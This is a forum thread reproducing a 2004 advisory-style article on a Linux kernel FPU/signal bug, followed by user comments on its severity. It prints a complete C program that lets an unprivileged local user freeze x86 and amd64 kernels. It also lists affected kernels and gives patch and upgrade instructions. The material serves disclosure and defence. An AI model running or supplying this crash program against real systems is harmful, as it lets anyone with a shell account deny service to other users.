New Kernel Crash

  • Joined: 04 Jan 2004
  • Posts: 179
  • Location: [NS]

The Evil Code

Running this simple C program crashes the Linux kernel.

crash.c.txt

  #include <sys/time.h>
  #include <signal.h>
  #include <unistd.h>

  /* SIGALRM handler: save the x87 FPU state, write a marker, load the
   * state back. fsave writes the 108-byte image into fpubuf, so it is an
   * output operand ("=m"); frstor only reads it. */
  static void Handler(int ignore)
  {
    char fpubuf[108];
    (void)ignore;
    __asm__ __volatile__ ("fsave %0\n" : "=m"(fpubuf));
    write(2, "*", 1);
    __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
  }

  int main(void)
  {
    struct itimerval spec;
    signal(SIGALRM, Handler);
    /* Deliver SIGALRM every 100 microseconds, starting 100 microseconds from now. */
    spec.it_interval.tv_sec=0;
    spec.it_interval.tv_usec=100;
    spec.it_value.tv_sec=0;
    spec.it_value.tv_usec=100;
    setitimer(ITIMER_REAL, &spec, NULL);
    /* Keep the process busy so the timer keeps interrupting it. */
    while(1)
      write(1, ".", 1);

    return 0;
  }



This bug is confirmed to be present when the code is compiled with GCC versions 2.96, 3.0, 3.1, 3.2, 3.3 and 3.3.2 and run on Linux kernel versions 2.4.2x and 2.6.x on x86 and amd64 systems. The GCC version is not what matters: the fsave/frstor sequence is hand-written inline assembly, so any compiler that accepts it emits the same instructions, and the flaw lies in how the kernel handles the resulting FPU state.
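The two instructions the handler above relies on are fsave, which writes the whole x87 state (status word included) to memory and reinitialises the FPU, and frstor, which loads such an image back, exception flags and all. The page does not spell out the root cause; the following added example (not part of the original article) shows the user-space side of what an fsave/frstor image can carry, without touching the kernel bug: it unmasks the x87 zero-divide exception, divides 1.0 by 0.0 (which only flags the exception, since x87 reports an unmasked exception on the next waiting instruction), snapshots the state with fnsave, and then demonstrates that frstor followed by fwait raises SIGFPE while frstor, fnclex, fwait does not. The struct and function names (fsave_image, reload_and_wait, fpu_pending_exception_demo) and the operands are this example's own. It needs an i386/x86-64 machine and a kernel that already has the fixes listed later on this page; on other architectures it compiles to a stub that returns -1.

```c
#define _POSIX_C_SOURCE 200809L
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#if defined(__i386__) || defined(__x86_64__)

/* 108-byte FNSAVE/FRSTOR image (32-bit protected-mode layout, which is also
 * what FNSAVE writes in 64-bit mode). Only the low 16 bits of each word matter. */
struct fsave_image {
    uint32_t cw, sw, tw;           /* control, status and tag words */
    uint32_t fip, fcs, fdp, fds;   /* last instruction / operand pointers */
    uint8_t  st[80];               /* ST(0)..ST(7), 10 bytes each */
};

#define X87_CW_ZM (1u << 2)   /* control word: zero-divide MASK bit */
#define X87_SW_ZE (1u << 2)   /* status word: zero-divide exception flag */
#define X87_SW_ES (1u << 7)   /* status word: error summary = unmasked exception pending */

static sigjmp_buf fpe_jump;

static void on_sigfpe(int sig)
{
    (void)sig;
    __asm__ __volatile__("fnclex");   /* drop the pending exception before leaving */
    siglongjmp(fpe_jump, 1);
}

/* Unmask zero-divide, compute 1.0/0.0 and snapshot the FPU with FNSAVE.
 * The divide only sets ZE and ES; the #MF fault is deferred to the next
 * waiting x87 instruction. FNSAVE is a no-wait instruction: it stores the
 * state, pending exception included, and then reinitialises the FPU. */
static void snapshot_with_pending_exception(struct fsave_image *img)
{
    uint16_t cw;
    float one = 1.0f, zero = 0.0f;   /* constructed operands */

    __asm__ __volatile__("fninit");
    __asm__ __volatile__("fnstcw %0" : "=m"(cw));
    cw &= (uint16_t)~X87_CW_ZM;
    __asm__ __volatile__("fldcw %0" : : "m"(cw));
    __asm__ __volatile__("flds %1\n\t"
                         "fdivs %2\n\t"      /* sets ZE and ES, no fault yet */
                         "fnsave %0"         /* save (ES included) and reinit */
                         : "=m"(*img) : "m"(one), "m"(zero));
}

/* Reload the snapshot with FRSTOR, optionally FNCLEX, then FWAIT.
 * Returns a bitmask: 1 = FNSTSW right after FRSTOR shows ES set (the
 * exception came back with the image), 2 = the FWAIT raised SIGFPE. */
static int reload_and_wait(const struct fsave_image *img, int clear_first)
{
    struct sigaction sa, old;
    volatile uint16_t sw = 0;
    volatile int faulted = 0;

    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_sigfpe;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGFPE, &sa, &old);

    if (sigsetjmp(fpe_jump, 1) == 0) {
        __asm__ __volatile__("frstor %0" : : "m"(*img));
        __asm__ __volatile__("fnstsw %0" : "=m"(sw));   /* no-wait: safe to read */
        if (clear_first)
            __asm__ __volatile__("fnclex");              /* the mitigation */
        __asm__ __volatile__("fwait");                   /* waiting: reports #MF */
    } else {
        faulted = 1;
    }
    __asm__ __volatile__("fninit");   /* leave the FPU clean for the caller */
    sigaction(SIGFPE, &old, NULL);

    return ((sw & X87_SW_ES) ? 1 : 0) | (faulted ? 2 : 0);
}

/* Runs the whole experiment. Returns a bitmask (15 = every observation held):
 *   1: the FNSAVE image carries ZE|ES (a pending, unmasked zero-divide)
 *   2: after FRSTOR the live status word has ES set again
 *   4: FRSTOR followed by FWAIT raised SIGFPE
 *   8: FRSTOR, FNCLEX, FWAIT did not raise SIGFPE
 * Returns -2 if the image struct does not come out at 108 bytes. */
int fpu_pending_exception_demo(void)
{
    struct fsave_image img;
    int r = 0, a, b;

    if (sizeof img != 108)
        return -2;
    snapshot_with_pending_exception(&img);
    if ((img.sw & (X87_SW_ZE | X87_SW_ES)) == (X87_SW_ZE | X87_SW_ES))
        r |= 1;
    a = reload_and_wait(&img, 0);
    if (a & 1) r |= 2;
    if (a & 2) r |= 4;
    b = reload_and_wait(&img, 1);
    if (!(b & 2)) r |= 8;
    return r;
}

#else
/* Not an x87 machine: nothing to demonstrate. */
int fpu_pending_exception_demo(void) { return -1; }
#endif

int main(void)
{
    int r = fpu_pending_exception_demo();
    printf("fpu_pending_exception_demo() = %d (15 = all four observations held)\n", r);
    return 0;
}
```

The point for a kernel is the third and fourth observations: the image a process hands to frstor (and, through a signal frame, to the kernel) can carry a pending unmasked exception, and the first waiting x87 instruction executed afterwards takes the fault, whoever executes it, unless the flags are cleared with fnclex first. The crash program differs only in that it runs its fsave/frstor pair inside a timer signal handler thousands of times per second; how that drives the unpatched kernel into a hang is what the linked lkml threads and the i387.h patches below are about.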

The Crashing Kernels

Minor numbers are the versions that were actually verified; this is just the tip of the iceberg:

* Linux 2.6.x
o 2.6.7-rc2
o 2.6.6 (vanilla)
o 2.6.6-rc1 SMP (verified by blaise)
o 2.6.6 SMP (verified by riven)
o 2.6.5-gentoo (verified by RatiX)
o 2.6.5-mm6 - (verified by Mariux)
o 2.6.5 (fedora core 2 vanilla)
o 2.6.3-13mdk (Mandrake)
* Linux 2.4.2x
o 2.4.26 vanilla
o 2.4.26, grsecurity 2.0 config
o 2.4.26-rc1 vanilla
o 2.4.26-gentoo-r1
o 2.4.22
o 2.4.22-1.2188 Fedora FC1 Kernel
o 2.4.20 RH7.3 (gcc 2.96)
o 2.4.18-bf2.4 (debian woody vanilla)

Even grsecurity-patched kernels crash. "I would have hoped that grsec would have blocked or logged something, but nothing appeared in the logs." Vincent

The safe kernels

This code does nothing but exit with the error message "Floating point exception" and cannot do any damage on systems running:

* Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel) Dylan Smith
* Linux Kernel 2.6.4 SMP patched with staircase scheduler Guille
* Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
* Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
* Linux Kernel 2.4.25-gentoo-r1 Charles A. Haines (3G Publishing)
* Linux kernel 2.2.19

It is unclear why these specific Gentoo patch sets of the 2.4.26 kernel are safe; other versions of the Gentoo kernel are not.

The user-mode Linux kernel 2.6.5-1um is safe. I assume this means other versions of User-mode Linux are safe as well.

Linux kernel 2.6.4 SMP with patches has been reported to be safe. The reporter uses a version patched with Con Kolivas' Staircase scheduler (which only affects the task scheduler), built with GCC 3.3.3. "System did not crash, I left the crash program 10 minutes and after that I killed the task and I continued using my system". Guille

The glitch is verified present in Linux 2.5.6 SMP and Linux 2.6.6 SMP.

The bug is not present in 2.2.19; it seems to affect only 2.4 and later.

The threat

Using this program to crash a Linux system requires the attacker to have shell access or some other way of uploading and running a binary (such as cgi-bin or FTP access). It works from any normal user account; root access is not required. It has reportedly been used to take down several "lame free-shell providers" (running code you know will damage a system, and hacking in general, is illegal in most parts of the world and strongly discouraged).

This code only works on x86-family Linux machines (amd64 included, see below). It does not compile (produces no executable) on sparc64 sun4u TI UltraSparc II (BlackBird), and it does not affect NetBSD stable.

SMP systems can also be taken down, but one instance of the program is needed per CPU before the whole system halts. Each instance locks up one CPU, and that process cannot be killed; on a two-CPU machine the second instance kills the entire machine.

Check your own system if you are wondering whether this affects you; better safe than sorry. Assume it will crash: sync (or even unmount) your file systems before testing. If the system is a production server with 1000 users online, do not test this code on that box.

How to protect yourself

The last few days have been frustrating. Compiling a large number of different kernel versions only to find that gcc crash.c -o evil && ./evil halts the system is quite dull. I hoped some kernels would be unaffected, because 2.4.26-rc3-gentoo and 2.4.26_pre6-gentoo are, but sadly almost all kernel versions die when evil is executed.

The linux-kernel mailing list may have solutions not mentioned on this page. The author subscribes to it and plans to post (better) solutions here as they appear.

Patch for 2.4.2x Kernels

There are two patches available; both work with 2.4.xx kernels:

* 2.4.26_i387.h_patch.txt
* signal.c-2.4.26.patch.txt (signal.c-2.4.21.patch.txt)

2.4.26_i387.h_patch.txt is the recommended one. With this patch applied evil does no damage, but it keeps running at 99% CPU until it is killed (like any other process). This is a general fix for the root cause of the flaw that evil exploits. The signal.c patch is specific to evil and makes the program exit instantly; this works, but it is not a very elegant solution.

Yours truly has tested both patches with kernel versions 2.4.25 and 2.4.26; the signal.c patch has also been tested with 2.4.21.

Follow these steps to get a safe vanilla kernel:

1. Read the Kernel Rebuild Guide if this is your first time compiling your own kernel
2. Download the latest kernel source, linux-2.4.26.tar.bz2, from your local Linux Kernel Mirror
3. Unpack the kernel source and make a symbolic link:
* cd /usr/src/
* tar xfvj linux-2.4.26.tar.bz2
* ln -s linux-2.4.26 linux
4. Download the patch for 2.4.26, 2.4.26_i387.h_patch.txt
5. Apply the patch:
* patch -p1 -d /usr/src/linux-2.4.26 <2.4.26_i387.h_patch.txt
6. Configure and compile as usual:
* make dep bzImage modules modules_install
* mount /boot (some distributions mount /boot on startup)
* cp arch/i386/boot/bzImage /boot
* You may want to give your new kernel a different name and edit your GRUB or LILO configuration.

The patches should apply cleanly to other 2.4.xx versions.

Kernel 2.4.26-rc3-gentoo

2.4.26-rc3-gentoo (gentoo-sources-2.4.26_pre5.patch.bz2) is safe. This is a patch set that turns linux-2.4.25 into 2.4.26-rc3-gentoo.

I have no idea why this kernel version is safe from this exploit; it just is. With this patch set, running evil ends with "Floating point exception" instead of locking the system.

This kernel can be used on any Linux system; it does not require any Gentoo-only tools.

General advice: it is a bad idea to use kernels and patches from unknown sources. You should only use software from trusted sources. I know this patch set is safe; you do not, and you should not take a stranger's word for it when it comes to security.

1. Read the Kernel Rebuild Guide if this is your first time compiling your own kernel
2. Download linux-2.4.25.tar.bz2 from your local Linux Kernel Mirror
3. Get the patch set for Gentoo 2.4.26-rc3-gentoo (mirror1) (mirror2), aka 2.4.26_pre5:
* wget re.a.la/gs (2,2M)
4. Unpack the 2.4.25 kernel source:
* cd /usr/src/
* tar xfvj linux-2.4.25.tar.bz2
5. Unpack and apply the Gentoo patch set:
* bunzip2 gentoo-sources-2.4.26_pre5.patch.bz2
* patch -p1 -d /usr/src/linux-2.4.25 <gentoo-sources-2.4.26_pre5.patch
6. Rename the kernel tree and make a symlink from /usr/src/linux:
* mv linux-2.4.25 linux-2.4.26-rc3-gentoo
* ln -s linux-2.4.26-rc3-gentoo linux
7. The Makefile now calls this kernel -rc5-gentoo, but the compiled kernel claims to be 2.4.26-rc3-gentoo. Presumably the original Gentoo ebuild changed the version in the Makefile or another configuration file to make these match. Open the Makefile in your favourite editor and change line 4 to say -rc3-gentoo:
* cd linux-2.4.26-rc3-gentoo
* nano -w Makefile
* "EXTRAVERSION = -rc5-gentoo" -> "EXTRAVERSION = -rc3-gentoo"
8. Configure your kernel:
* Using your old config: cp /usr/src/linux-oldversion/.config .config && make oldconfig
* The Linux kernel can also be configured with make menuconfig (CLI) or make xconfig (GUI)
9. Compile your new kernel and install as usual:
* make dep bzImage modules modules_install
* mount /boot (some distributions mount /boot on startup)
* cp arch/i386/boot/bzImage /boot
* You may want to give your new kernel a different name and edit your GRUB or LILO configuration.

Congratulations. You are now running the 2.4.26-rc3-gentoo kernel.

2.6.xx kernels

A patch for i387.h (2.6.7-rc3-bk5_i387.h.patch.txt), included in kernel 2.6.7-rc3-bk5, has been tested successfully on 2.6.5 and 2.6.7-rc3 by Marc Ballarin.

It has been tested successfully on Linux 2.6.7-rc2 by yours truly.

The i387.h patch seems to be the best solution. When evil is executed the system does not freeze, but unlike the alternative patches it leaves evil running at 99.9% CPU. It can be stopped with Ctrl-C, kill or killall.

1. Read the Kernel Rebuild Guide if this is your first time compiling your own kernel
2. Get a kernel from kernel.org and unpack it to /usr/src
3. Get 2.6.7-rc3-bk5_i387.h.patch.txt
4. patch -p1 -d /usr/src/linux-2.6.7-rc2 <2.6.7-rc3-bk5_i387.h.patch.txt (adjust the directory to the version you unpacked)
5. Follow the usual steps.

Other solutions:

* Andi Kleen has posted a patch for linux-2.6.7-rc3 on the linux-kernel mailing list, available at
o PATCH fix for Re: timer + fpu stuff locks my console race.
o lkml.org/lkml/2004/6/12/88
o Raw message: andi_kleen_patch.txt
* Stian Skjelstad's patch also works with 2.6.7
o lkml.org/lkml/2004/6/12/64
* Sergey Vlasov has a solution at
o lkml.org/lkml/2004/6/12/81

amd64

IMPORTANT: amd64 is affected as well.

The fix is the same as on x86 (it is included in 2.6.7-rc3-bk6); the file that needs the change is include/asm-x86_64/i387.h. Marc Ballarin

Fedora Core 2

Red Hat has now released a patched kernel for Fedora Core 2 (Fedora Update Notification FEDORA-2004-171, 2004-06-14).

sudo yum -y update 'kernel*'

will upgrade your kernel to the safe version 2.6.6, release 1.435. (Quote the pattern so the shell does not expand it against files in the current directory.)

Bug reports

* The exploit was reported as gcc bug 15905 on 2004-06-09.
* It was reported to the linux-kernel list with the subject "timer + fpu stuff locks my console race".
* Reported to Gentoo Bugzilla as bug 53804



  • Joined: 18 Apr 2003
  • Posts: 550

This is terrible, without root access...



  • Joined: 04 Jan 2004
  • Posts: 179
  • Location: [NS]

Yes, yes, an ordinary user can kill it!

  • mr_W
  • Honorary citizen
  • Joined: 22 Mar 2004
  • Posts: 835

Well yes.. but why would I give any kind of user account to someone who would want to kill my machine?

Granted, there are cases where a shell is given to various unknown people, but for the most part you give a shell to someone who also has an interest in the machine working flawlessly..

So I don't see it as something fatal.

  • AxeZ
  • Legendary citizen
  • Joined: 17 Apr 2003
  • Posts: 3989
  • Location: Novi Sad, Vojvodina

The mere fact that you have to have an account on that machine stops 99.999999999% of malicious users.

  • Joined: 18 Apr 2003
  • Posts: 550

The thing is, this is very reminiscent of those Windows situations where someone comes over to install a game and leaves you a virus or a trojan; meaning, if he has physical access to the machine, he can do whatever he wants. Until now you needed root access and then had to exploit some vulnerability, which still required some knowledge; now I come over to AxeZ's, and while he's making coffee I trash his machine, and afterwards I go around saying: that Slack, what a piece of crap ;)

  • AxeZ
  • Legendary citizen
  • Joined: 17 Apr 2003
  • Posts: 3989
  • Location: Novi Sad, Vojvodina

BrainkillA :: The thing is, this is very reminiscent of those Windows situations where someone comes over to install a game and leaves you a virus or a trojan; meaning, if he has physical access to the machine, he can do whatever he wants. Until now you needed root access and then had to exploit some vulnerability, which still required some knowledge; now I come over to AxeZ's, and while he's making coffee I trash his machine, and afterwards I go around saying: that Slack, what a piece of crap ;)

Come on, that has nothing to do with it..
Local root exploits that work from a user account have existed for a decade; the only problem is that they are "local".
Meaning you have to have access to the machine.
The other kind, remote root exploits, are more dangerous; those let any brat screw up your stuff if he knows how to compile an exploit.
Luckily most of them are too stupid to compile it, and the ones who aren't that stupid usually have a hard time abusing it even once they compile it, because the exploit author, in his l33t-ness, deliberately broke the shellcode.
This isn't always the case, but it is quite often.

So as far as I can tell this doesn't even grant root privileges, and the kernel has surely already been patched against this bug, so I'm not worrying much.

Oh, and whoever comes over to AxeZ's for coffee should keep in mind that they must not poke around AxeZ's computers, for one simple reason....... AxeZ is vindictive... :)

  • Joined: 18 Apr 2003
  • Posts: 550

I'm not saying it's the end of the world, but it brings back ugly memories of the Windows days ;), that's all. And then one of those computer-moron buddies of mine will come tell me: "bro, a virus for Linux came out" ;)

  • AxeZ
  • Legendary citizen
  • Joined: 17 Apr 2003
  • Posts: 3989
  • Location: Novi Sad, Vojvodina

BrainkillA :: I'm not saying it's the end of the world, but it brings back ugly memories of the Windows days ;), that's all. And then one of those computer-moron buddies of mine will come tell me: "bro, a virus for Linux came out" ;)

Come on, there's nothing to bring back.... first, it can't replicate; second, there's no privil escalation, meaning you don't get root. This is a plain DoS attack on the kernel for which you have to be at the computer (or on it over ssh), have an account on it, and hope the kernel isn't patched.

  • Joined: 18 Apr 2003
  • Posts: 550

Explain that to the idiots, that's all I'm saying... I know these twenty lines of code aren't a virus :).
